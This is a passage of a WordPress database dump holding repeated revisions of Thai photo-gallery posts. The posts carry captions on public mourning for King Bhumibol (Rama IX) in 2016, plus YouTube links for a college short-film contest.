ในหลวงรัชกาลที่ 8 และในหลวงรัชกาลที่ 9 เคยเสด็จเยี่ยมเป็นการส่วนพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4487\" src=\"/wp-content/uploads/2018/11/14-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พ่อค้าแม่ค้าชุมชนชาวปากคลองตลาด ร่วมกันจัดซุ้มดอกไม้และจุดเทียนน้อมถวายอาลัยในวันที่ 5 ธันวาคม พ.ศ. ๒๕๕๙ ซึ่งเป็นวันคล้ายวันพระราชสมภพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมทางเท้า ปากคลองตลาด กรุงเทพฯ</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">นักศึกษาภาควิชาวิจิตรศิลป์ คณะสถาปัตยกรรมศาสตร์</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4488\" src=\"/wp-content/uploads/2018/11/18-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">สถาบันเทคโนโลยีพระจอมเกล้าเจ้าคุณทหารลาดกระบัง ร่วมกันวาดพระบรมสาทิสลักษณ์ของในหลวงรัชกาลที่ 9 พร้อมน้อมนําพระราชดํารัส “เสียใจได้ แต่อย่าละเลยหน้าที่” มาเขียนประกอบภาพวาดด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">มูลนิธิพระคชบาล ได้นําช้าง 11 เชือก จากวังช้างอยุธยา</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4490\" src=\"/wp-content/uploads/2018/11/19-Chanklang-Kanthong-copy-1024x581.jpg\" alt=\"\" width=\"640\" height=\"363\" />\r\n<p style=\"text-align: center;\">พร้อมด้วยควาญช้างกลุ่มคชสารราว 200 คน เดินทางไปถวายความอาลัย และสักการะพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณหน้าประตูมณีนพรัตน์ พระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“มอเตอร์ไซค์จิตอาสา”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4491\" src=\"/wp-content/uploads/2018/11/22-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">มอเตอร์ไซค์จิตอาสาให้บริการรับ-ส่งฟรี สําหรับประชาชนที่เดินทางมาถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ บริเวณโดยรอบสนามหลวง “ตั้งใจจะมาจนกว่าจะเสร็จพระราชพิธีถวายพระเพลิงพระบรมศพเลยครับ” จิตอาสารายหนึ่งกล่าว</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4492\" src=\"/wp-content/uploads/2018/11/25-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และบุคลากรจากคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัยและโรงพยาบาลจุฬาลงกรณ์ จุดเทียนถวายอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n<img class=\"aligncenter size-large wp-image-4493\" src=\"/wp-content/uploads/2018/11/31-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">นางไพเราะ เยอเบาะ หญิงชาวอาข่า หนึ่งใน 999 คน จาก 9 ชนเผ่าที่สูงที่เข้าถวายสักการะพระบรมศพ ณ พระที่นั่งดุสิตมหาปราสาท ได้โชว์เหรียญพระราชทานเพื่อใช้แทนบัตรประชาชนในอดีต จากในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">เจ้าหน้าที่พยาบาลพยุงนักเรียนพยาบาลที่มาร่วมงาน “จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4494\" src=\"/wp-content/uploads/2018/11/33-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">จัดขึ้นโดย โรงพยาบาลจุฬาลงกรณ์ สภากาชาดไทย ร่วมกับคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัย เพื่อรําลึกถึงพระมหากรุณาธิคุณพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ ลานหน้าพระบรมราชานุสาวรีย์ รัชกาลที่ ๖ สวนลุมพินี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ทําดีเพื่อพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4495\" src=\"/wp-content/uploads/2018/11/40-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ธวิน ปินะถา หรือ “เพ็ชรน้อยหัวใจเพชร”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4496\" src=\"/wp-content/uploads/2018/11/46-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชายหนุ่มขาพิการทั้งสองข้าง เดินทางจากบ้านเกิดในจังหวัดมหาสารคามมายังพระบรมมหาราชวังด้วยความมุ่งมั่นอุตสาหะเป็นระยะทางกว่า 500 กิโลเมตร ด้วยจักรยานคู่ชีพที่ประกอบขึ้นเอง เพื่อมาสักการะพระบรมศพ</p>\r\n ', 'ภาพถ่าย โดย จันทร์กลาง กันทอง', '', 'inherit', 'closed', 'closed', '', '4482-revision-v1', '', '', '2018-11-15 13:27:36', '2018-11-15 06:27:36', '', 4482, 'http://www.technicrayong.ac.th/4482-revision-v1/', 0, 'revision', '', 0),
(4527, 3, '2018-11-15 13:29:22', '2018-11-15 06:29:22', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ภายในพิธีสวดเจริญพระพุทธมนต์เจริญชัยมงคลคาถา</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4485\" src=\"/wp-content/uploads/2018/11/5-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\"> ถวายพระพรสมเด็จพระบรมโอรสาธิราช เจ้าฟ้ามหาวชิราลงกรณ สยามกุฎราชกุมาร ขึ้นทรงราชย์สืบราชสันตติวงศ์เป็นพระมหากษัตริย์ รัชกาลที่ ๑๐ วันที่ ๑ ธันวาคม พ.ศ. ๒๕๕๙ ณ วัดบวรนิเวศวิหารที่พระองค์เสด็จประทับเมื่อทรงผนวช เมื่อปี พ.ศ. 2512</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ดาโต๊ะ ดร.เฟาซัน หลังปูเต๊ะ และพี่น้องมุสลิม\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4486\" src=\"/wp-content/uploads/2018/11/11-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">“ชุมชนมัสยิดต้นสน” ร่วมกันทําพิธีสวดดุอาอ์ถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ชุมชนมุสลิมเก่าแก่ย่านบางกอกใหญ่แห่งนี้ครั้งหนึ่งกษัตริย์สองพี่น้อง ในหลวงรัชกาลที่ 8 และในหลวงรัชกาลที่ 9 เคยเสด็จเยี่ยมเป็นการส่วนพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4487\" src=\"/wp-content/uploads/2018/11/14-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พ่อค้าแม่ค้าชุมชนชาวปากคลองตลาด ร่วมกันจัดซุ้มดอกไม้และจุดเทียนน้อมถวายอาลัยในวันที่ 5 ธันวาคม พ.ศ. ๒๕๕๙ ซึ่งเป็นวันคล้ายวันพระราชสมภพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมทางเท้า ปากคลองตลาด กรุงเทพฯ</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">นักศึกษาภาควิชาวิจิตรศิลป์ คณะสถาปัตยกรรมศาสตร์</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4488\" src=\"/wp-content/uploads/2018/11/18-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">สถาบันเทคโนโลยีพระจอมเกล้าเจ้าคุณทหารลาดกระบัง ร่วมกันวาดพระบรมสาทิสลักษณ์ของในหลวงรัชกาลที่ 9 พร้อมน้อมนําพระราชดํารัส “เสียใจได้ แต่อย่าละเลยหน้าที่” มาเขียนประกอบภาพวาดด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">มูลนิธิพระคชบาล ได้นําช้าง 11 เชือก จากวังช้างอยุธยา</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4490\" src=\"/wp-content/uploads/2018/11/19-Chanklang-Kanthong-copy-1024x581.jpg\" alt=\"\" width=\"640\" height=\"363\" />\r\n<p style=\"text-align: center;\">พร้อมด้วยควาญช้างกลุ่มคชสารราว 200 คน เดินทางไปถวายความอาลัย และสักการะพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณหน้าประตูมณีนพรัตน์ พระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“มอเตอร์ไซค์จิตอาสา”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4491\" src=\"/wp-content/uploads/2018/11/22-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">มอเตอร์ไซค์จิตอาสาให้บริการรับ-ส่งฟรี สําหรับประชาชนที่เดินทางมาถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ บริเวณโดยรอบสนามหลวง “ตั้งใจจะมาจนกว่าจะเสร็จพระราชพิธีถวายพระเพลิงพระบรมศพเลยครับ” จิตอาสารายหนึ่งกล่าว</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4492\" src=\"/wp-content/uploads/2018/11/25-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และบุคลากรจากคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัยและโรงพยาบาลจุฬาลงกรณ์ จุดเทียนถวายอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n<img class=\"aligncenter size-large wp-image-4493\" src=\"/wp-content/uploads/2018/11/31-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">นางไพเราะ เยอเบาะ หญิงชาวอาข่า หนึ่งใน 999 คน จาก 9 ชนเผ่าที่สูงที่เข้าถวายสักการะพระบรมศพ ณ พระที่นั่งดุสิตมหาปราสาท ได้โชว์เหรียญพระราชทานเพื่อใช้แทนบัตรประชาชนในอดีต จากในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">เจ้าหน้าที่พยาบาลพยุงนักเรียนพยาบาลที่มาร่วมงาน “จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4494\" src=\"/wp-content/uploads/2018/11/33-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">จัดขึ้นโดย โรงพยาบาลจุฬาลงกรณ์ สภากาชาดไทย ร่วมกับคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัย เพื่อรําลึกถึงพระมหากรุณาธิคุณพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ ลานหน้าพระบรมราชานุสาวรีย์ รัชกาลที่ ๖ สวนลุมพินี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ทําดีเพื่อพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4495\" src=\"/wp-content/uploads/2018/11/40-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ธวิน ปินะถา หรือ “เพ็ชรน้อยหัวใจเพชร”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4496\" src=\"/wp-content/uploads/2018/11/46-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชายหนุ่มขาพิการทั้งสองข้าง เดินทางจากบ้านเกิดในจังหวัดมหาสารคามมายังพระบรมมหาราชวังด้วยความมุ่งมั่นอุตสาหะเป็นระยะทางกว่า 500 กิโลเมตร ด้วยจักรยานคู่ชีพที่ประกอบขึ้นเอง เพื่อมาสักการะพระบรมศพ</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“บนเส้นทาง คําสอนของพ่อ 70 ปี ที่ครองราชย์”</span></h3>\r\n ', 'ภาพถ่าย โดย จันทร์กลาง กันทอง', '', 'inherit', 'closed', 'closed', '', '4482-revision-v1', '', '', '2018-11-15 13:29:22', '2018-11-15 06:29:22', '', 4482, 'http://www.technicrayong.ac.th/4482-revision-v1/', 0, 'revision', '', 0),
(4528, 3, '2018-11-15 13:29:44', '2018-11-15 06:29:44', 'https://youtu.be/xrNi-56jrzQ\r\n\r\nhttps://www.youtube.com/watch?v=QO9X6zaqiWA\r\n<h2><span style=\"color: #993300;\"><strong>เชิญชมภาพถ่าย คลิก Link ด้านล่าง</strong></span></h2>\r\n<h3><span style=\"color: #003300;\"><a style=\"color: #003300;\" href=\"/ภาพถ่าย-โดย-อรุณ-ร้อยศรี\">ภาพถ่าย โดย อรุณ ร้อยศรี</a></span></h3>\r\n<h3><a href=\"/ภาพถ่าย-โดย-บัณฑิต-โชติส\"><span style=\"color: #003300;\">ภาพถ่าย โดย บัณฑิต โชติสุวรรณ</span></a></h3>\r\n<h3><a href=\"http://www.technicrayong.ac.th/ภาพถ่าย-โดย-จันทร์กลาง-ก\"><span style=\"color: #003300;\">ภาพถ่าย โดย จันทร์กลาง กันทอง</span></a></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย เริงชัย คงเมือง</span></h3>\r\n<h3><span style=\"color: #003300;\">ภาพถ่าย โดย เริงฤทธิ์ คงเมือง</span></h3>', '๑๐๐ วัน เปลี่ยนความโทมนัสเป็นพลัง', '', 'inherit', 'closed', 'closed', '', '3805-revision-v1', '', '', '2018-11-15 13:29:44', '2018-11-15 06:29:44', '', 3805, 'http://www.technicrayong.ac.th/3805-revision-v1/', 0, 'revision', '', 0),
(4529, 3, '2018-11-15 13:31:02', '2018-11-15 06:31:02', 'https://youtu.be/GwqyX1Gk5N0\r\n\r\nhttps://youtu.be/T10s06PGMHI\r\n\r\nhttps://youtu.be/ckSfZebcsik\r\n\r\nhttps://youtu.be/E74lDuIBBQA\r\n\r\nhttps://youtu.be/4KA6AsI33Z0\r\n\r\nhttps://youtu.be/riq-rXXRrho\r\n\r\nhttps://youtu.be/l2WJsXiMBDw\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ประกวดหนังสั้น \"อาชีวะทำดีเพื่อพ่อ\"', '', 'inherit', 'closed', 'closed', '', '4478-revision-v1', '', '', '2018-11-15 13:31:02', '2018-11-15 06:31:02', '', 4478, 'http://www.technicrayong.ac.th/4478-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4530, 3, '2018-11-15 13:41:31', '2018-11-15 06:41:31', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ภายในพิธีสวดเจริญพระพุทธมนต์เจริญชัยมงคลคาถา</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4485\" src=\"/wp-content/uploads/2018/11/5-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\"> ถวายพระพรสมเด็จพระบรมโอรสาธิราช เจ้าฟ้ามหาวชิราลงกรณ สยามกุฎราชกุมาร ขึ้นทรงราชย์สืบราชสันตติวงศ์เป็นพระมหากษัตริย์ รัชกาลที่ ๑๐ วันที่ ๑ ธันวาคม พ.ศ. ๒๕๕๙ ณ วัดบวรนิเวศวิหารที่พระองค์เสด็จประทับเมื่อทรงผนวช เมื่อปี พ.ศ. 2512</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ดาโต๊ะ ดร.เฟาซัน หลังปูเต๊ะ และพี่น้องมุสลิม\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4486\" src=\"/wp-content/uploads/2018/11/11-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">“ชุมชนมัสยิดต้นสน” ร่วมกันทําพิธีสวดดุอาอ์ถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ชุมชนมุสลิมเก่าแก่ย่านบางกอกใหญ่แห่งนี้ครั้งหนึ่งกษัตริย์สองพี่น้อง ในหลวงรัชกาลที่ 8 และในหลวงรัชกาลที่ 9 เคยเสด็จเยี่ยมเป็นการส่วนพระองค์</p>\r\n<img class=\"aligncenter size-large wp-image-4487\" src=\"/wp-content/uploads/2018/11/14-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พ่อค้าแม่ค้าชุมชนชาวปากคลองตลาด ร่วมกันจัดซุ้มดอกไม้และจุดเทียนน้อมถวายอาลัยในวันที่ 5 ธันวาคม พ.ศ. ๒๕๕๙ ซึ่งเป็นวันคล้ายวันพระราชสมภพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมทางเท้า ปากคลองตลาด กรุงเทพฯ</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">นักศึกษาภาควิชาวิจิตรศิลป์ คณะสถาปัตยกรรมศาสตร์</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4488\" src=\"/wp-content/uploads/2018/11/18-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">สถาบันเทคโนโลยีพระจอมเกล้าเจ้าคุณทหารลาดกระบัง ร่วมกันวาดพระบรมสาทิสลักษณ์ของในหลวงรัชกาลที่ 9 พร้อมน้อมนําพระราชดํารัส “เสียใจได้ แต่อย่าละเลยหน้าที่” มาเขียนประกอบภาพวาดด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">มูลนิธิพระคชบาล ได้นําช้าง 11 เชือก จากวังช้างอยุธยา</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4490\" src=\"/wp-content/uploads/2018/11/19-Chanklang-Kanthong-copy-1024x581.jpg\" alt=\"\" width=\"640\" height=\"363\" />\r\n<p style=\"text-align: center;\">พร้อมด้วยควาญช้างกลุ่มคชสารราว 200 คน เดินทางไปถวายความอาลัย และสักการะพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณหน้าประตูมณีนพรัตน์ พระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“มอเตอร์ไซค์จิตอาสา”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4491\" src=\"/wp-content/uploads/2018/11/22-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">มอเตอร์ไซค์จิตอาสาให้บริการรับ-ส่งฟรี สําหรับประชาชนที่เดินทางมาถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ณ บริเวณโดยรอบสนามหลวง “ตั้งใจจะมาจนกว่าจะเสร็จพระราชพิธีถวายพระเพลิงพระบรมศพเลยครับ” จิตอาสารายหนึ่งกล่าว</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4492\" src=\"/wp-content/uploads/2018/11/25-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">แพทย์ พยาบาล และบุคลากรจากคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัยและโรงพยาบาลจุฬาลงกรณ์ จุดเทียนถวายอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n<img class=\"aligncenter size-large wp-image-4493\" src=\"/wp-content/uploads/2018/11/31-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">นางไพเราะ เยอเบาะ หญิงชาวอาข่า หนึ่งใน 999 คน จาก 9 ชนเผ่าที่สูงที่เข้าถวายสักการะพระบรมศพ ณ พระที่นั่งดุสิตมหาปราสาท ได้โชว์เหรียญพระราชทานเพื่อใช้แทนบัตรประชาชนในอดีต จากในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">เจ้าหน้าที่พยาบาลพยุงนักเรียนพยาบาลที่มาร่วมงาน “จุฬาฯ เทิด ธ พระภูมิพล”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4494\" src=\"/wp-content/uploads/2018/11/33-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">จัดขึ้นโดย โรงพยาบาลจุฬาลงกรณ์ สภากาชาดไทย ร่วมกับคณะแพทยศาสตร์ จุฬาลงกรณ์มหาวิทยาลัย เพื่อรําลึกถึงพระมหากรุณาธิคุณพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ ลานหน้าพระบรมราชานุสาวรีย์ รัชกาลที่ ๖ สวนลุมพินี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ทําดีเพื่อพ่อ”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4495\" src=\"/wp-content/uploads/2018/11/40-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ธวิน ปินะถา หรือ “เพ็ชรน้อยหัวใจเพชร”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4496\" src=\"/wp-content/uploads/2018/11/46-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ชายหนุ่มขาพิการทั้งสองข้าง เดินทางจากบ้านเกิดในจังหวัดมหาสารคามมายังพระบรมมหาราชวังด้วยความมุ่งมั่นอุตสาหะเป็นระยะทางกว่า 500 กิโลเมตร ด้วยจักรยานคู่ชีพที่ประกอบขึ้นเอง เพื่อมาสักการะพระบรมศพ</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“บนเส้นทาง คําสอนของพ่อ 70 ปี ที่ครองราชย์”</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4497\" src=\"/wp-content/uploads/2018/11/47-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n\r\n<img class=\"aligncenter size-large wp-image-4498\" src=\"/wp-content/uploads/2018/11/48-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">ประชาชนต่างพากันเข้าไปสัมผัสเปลือกไม้จันทน์หอม แล้วนํามาแตะหน้าผากของตนเพื่อความเป็นสิริมงคล ขณะเข้าร่วมพิธีบวงสรวงตัดไม้จันทน์หอม 12 ต้น ที่ยืนต้นตายธรรมชาติในพื้นที่อุทยานแห่งชาติกุยบุรี จังหวัดประจวบคีรีขันธ์เพื่อนํามาจัดสร้างพระโกศทรงพระบรมศพเหนือพระจิตกาธานบนพระเมรุมาศ ในงานพระราชพิธีถวายพระเพลิงพระบรมศพ พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ประชาชนร่วมจุดเทียนแสดงความอาลัย ณ โรงพยาบาลศิริราช</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4499\" src=\"/wp-content/uploads/2018/11/61-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เพื่อถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เสด็จสวรรคตครบ 1 เดือน</p>\r\n<img class=\"aligncenter size-large wp-image-4500\" src=\"/wp-content/uploads/2018/11/82-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">พ่อค้าแม่ค้าชุมชนชาวปากคลองตลาด ร่วมกันจัดซุ้มดอกไม้ และจุดเทียนน้อมถวายความอาลัยในวันที่ 5 ธันวาคม พ.ศ. 2559 ซึ่งเป็นวันคล้ายวันพระราชสมภพของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมทางเท้า ปากคลองตลาด กรุงเทพมหานคร</p>\r\n<img class=\"aligncenter size-large wp-image-4501\" src=\"/wp-content/uploads/2018/11/83-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เจ้าหน้าที่วัดบวรนิเวศวิหาร ลั่นฆ้องตีกลองก่อนที่พระภิกษุจะประกอบพิธีสวดเจริญพระพุทธมนต์ เจริญชัยมงคลคาถา ถวายพระพรสมเด็จพระบรมโอรสาธิราช เจ้าฟ้ามหาวชิราลงกรณ สยามมกุฎราชกุมาร ขึ้นทรงราชย์สืบราชสันตติวงศ์เป็ นพระมหากษัตริย์รัชกาลที่ ๑๐ วันที่ ๑ ธันวาคม พ.ศ. ๒๕๕๙</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ข้าราชการ ประชาชน และนักเรียนนักศึกษาต่างรวมตัวกัน</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4502\" src=\"/wp-content/uploads/2018/11/84-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">เป็นจิตอาสา เพื่อร่วมทําความดีถวายเป็นพระราชกุศลแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ในภาพเป็นการให้บริการตัดผมฟรีที่บริเวณสนามหลวง</p>\r\n ', 'ภาพถ่าย โดย จันทร์กลาง กันทอง', '', 'inherit', 'closed', 'closed', '', '4482-revision-v1', '', '', '2018-11-15 13:41:31', '2018-11-15 06:41:31', '', 4482, 'http://www.technicrayong.ac.th/4482-revision-v1/', 0, 'revision', '', 0),
(4531, 3, '2018-11-15 13:54:35', '2018-11-15 06:54:35', '<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">ภายในพิธีสวดเจริญพระพุทธมนต์เจริญชัยมงคลคาถา</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4485\" src=\"/wp-content/uploads/2018/11/5-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\"> ถวายพระพรสมเด็จพระบรมโอรสาธิราช เจ้าฟ้ามหาวชิราลงกรณ สยามกุฎราชกุมาร ขึ้นทรงราชย์สืบราชสันตติวงศ์เป็นพระมหากษัตริย์ รัชกาลที่ ๑๐ วันที่ ๑ ธันวาคม พ.ศ. ๒๕๕๙ ณ วัดบวรนิเวศวิหารที่พระองค์เสด็จประทับเมื่อทรงผนวช เมื่อปี พ.ศ. 2512</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ดาโต๊ะ ดร.เฟาซัน หลังปูเต๊ะ และพี่น้องมุสลิม\"</span></h3>\r\n<img class=\"aligncenter size-large wp-image-4486\" src=\"/wp-content/uploads/2018/11/11-Chanklang-Kanthong-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" />\r\n<p style=\"text-align: center;\">“ชุมชนมัสยิดต้นสน” 